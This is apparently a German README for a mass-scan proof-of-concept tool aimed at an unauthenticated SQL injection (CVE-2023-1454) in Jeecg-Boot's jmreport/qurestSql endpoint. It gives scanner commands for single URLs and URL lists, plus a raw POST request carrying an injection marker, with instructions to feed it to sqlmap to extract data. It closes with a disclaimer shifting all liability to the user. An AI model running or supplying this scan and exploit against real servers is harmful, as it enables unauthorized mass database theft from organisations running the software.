
jmreport/qurestSql nicht autorisierter SQL-Injection-Massenscan-PoC
jmreport/qurestSql Unautorisierter SQL-Injection Massen-Scan PoC Jeecg-Boot ist eine schnelle Entwicklungsplattform basierend auf Spring Boot und Jeecg-Boot-Plus. In der neuesten Version jeecg-boot 3.5.0 wurden mehrere SQL-Injection-Schwachstellen entdeckt.
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Einzel-URL-Test
python3 CVE-2023-1454-scan.py -f url.txt Massen-Scan
Nach dem Scan wird im aktuellen Verzeichnis eine Datei vuln.txt mit den anfälligen URLs erstellt.
poc:

exp:
Speichern Sie das Paket als txt-Datei und verwenden Sie sqlmap, um die Daten zu extrahieren.
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Für jegliche direkten oder indirekten Folgen und Verluste, die durch die Verbreitung oder Nutzung der in diesem Dokument bereitgestellten Informationen entstehen, ist allein der Benutzer verantwortlich. Der Autor übernimmt keinerlei Haftung.